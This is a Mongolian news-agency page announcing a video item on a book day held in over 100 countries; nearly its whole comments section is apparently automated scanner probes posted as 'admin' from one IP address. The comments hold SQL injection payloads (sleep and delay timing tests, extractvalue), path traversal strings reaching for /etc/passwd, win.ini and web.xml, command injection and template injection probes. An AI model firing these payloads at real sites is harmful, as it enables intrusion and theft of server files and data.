Дэлхийн 100 гаруй оронд номын баяр тэмдэглэдэг

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-05-22 19:26:11
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin 194.163.191.42 29 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('h',9)='h
 • admin 194.163.191.42 29 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('r',0)='r
 • admin 194.163.191.42 29 өдөр

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('g',9)
 • admin 194.163.191.42 29 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('o',0)
 • admin 194.163.191.42 29 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:9
 • admin 194.163.191.42 29 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 29 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:9'/**/
 • admin 194.163.191.42 29 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 29 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(9))::text>'0
 • admin 194.163.191.42 29 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 29 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(9))>0/**/
 • admin 194.163.191.42 29 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 29 өдөр

  123456"and(select*from(select+sleep(9))a/**/union/**/select+1)="
 • admin 194.163.191.42 29 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 194.163.191.42 29 өдөр

  123456'and(select*from(select+sleep(9))a/**/union/**/select+1)='
 • admin 194.163.191.42 29 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 29 өдөр

  (select*from(select+sleep(9)union/**/select+1)a)
 • admin 194.163.191.42 29 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 29 өдөр

  123456"and"o"="u
 • admin 194.163.191.42 29 өдөр

  123456"and"w"="w
 • admin 194.163.191.42 29 өдөр

  123456'and'd'='f
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456'and'h'='h
 • ../../../../WEB-INF/web.xml 194.163.191.42 29 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456/**/and+1=9
 • ../../../WEB-INF/web.xml 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456/**/and+3=3
 • ../../WEB-INF/web.xml;admin 194.163.191.42 29 өдөр

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 29 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 29 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 29 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 29 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 29 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 29 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 29 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 29 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 29 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 29 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 29 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 29 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 29 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 29 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456'"\(
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 29 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1866119513')))>'0
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 29 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1655268014')))
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('h',9)='h 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456/**/and/**/cast(md5('1433589347')as/**/int)>0
 • admin 194.163.191.42 29 өдөр

  123456'and(select'1'from/**/cast(md5(1609441060)as/**/int))>'0
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',0)='t 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  extractvalue(1,concat(char(126),md5(1300895283)))
 • admin'and(select+1)>0waitfor/**/delay'0:0:9 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1410574602)))and"
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 29 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1326253348)))and'
 • admin 194.163.191.42 29 өдөр

  expr 987912706 + 876186079
 • admin'/**/and(select'1'from/**/pg_sleep(9))::text>'0 194.163.191.42 29 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 29 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456&set /A 870754824+868494823
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456$(expr 868217382 + 906984664)
 • admin"and(select*from(select+sleep(9))a/**/union/**/select+1)=" 194.163.191.42 29 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456|expr 853987072 + 953694968
 • %2fetc%2fpasswd 194.163.191.42 29 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456 expr 808910048 + 968704516
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 29 өдөр

  123456
 • /etc/passwd 194.163.191.42 29 өдөр

  123456
 • <%- 894933316+960150668 %> 194.163.191.42 29 өдөр

  123456
 • admin'and(select*from(select+sleep(9))a/**/union/**/select+1)=' 194.163.191.42 29 өдөр

  123456
 • #set($c=915876848+956843807)${c}$c 194.163.191.42 29 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 29 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 29 өдөр

  123456
 • ${(846876081+850746810)?c} 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 29 өдөр

  123456
 • ${974861126+880332355} 194.163.191.42 29 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456
 • /*1*/{{963526496+864561743}} 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  <%- 873637548+959437972 %>
 • admin'"\( 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  #set($c=889982934+998004768)${c}$c
 • ../../../../../../etc/passwd 194.163.191.42 29 өдөр

  123456
 • admin"and"z"="f 194.163.191.42 29 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  ${(974282115+910441864)?c}
 • admin 194.163.191.42 29 өдөр

  ${995664419+816465016}
 • admin"and"y"="y 194.163.191.42 29 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1215852874')))>'0 194.163.191.42 29 өдөр

  123456
 • expr 840257524 + 966410539 194.163.191.42 29 өдөр

  123456
 • admin'and'h'='p 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  /*1*/{{916303024+814527777}}
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1783020639'))) 194.163.191.42 29 өдөр

  123456
 • admin&set /A 915933977+849865361 194.163.191.42 29 өдөр

  123456
 • admin'and'l'='l 194.163.191.42 29 өдөр

  123456
 • admin/**/and/**/cast(md5('1284413634')as/**/int)>0 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1936682159)as/**/int))>'0 194.163.191.42 29 өдөр

  123456
 • '-var_dump(md5(613030284))-' 194.163.191.42 29 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 29 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1061661607))) 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1599894713)))and" 194.163.191.42 29 өдөр

  123456
 • admin$(expr 863793436 + 880140926) 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1563987488)))and' 194.163.191.42 29 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 29 өдөр

  123456
 • ${@var_dump(md5(137952733))}; 194.163.191.42 29 өдөр

  123456
 • vubonmokwqhnqdfjepzy 194.163.191.42 29 өдөр

  123456
 • ${973105997+851542380} 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456
 • admin|expr 891166644 + 823087701 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  ${907201821+946545826}
 • admin 194.163.191.42 29 өдөр

  '-var_dump(md5(510227647))-'
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 29 өдөр

  123456
 • admin expr 892574431 + 818203994 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  vubonmokwqhnqdfjepzy
 • admin 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  ${@var_dump(md5(182153806))};
 • admin 194.163.191.42 29 өдөр

  123456
 • admin 194.163.191.42 29 өдөр

  123456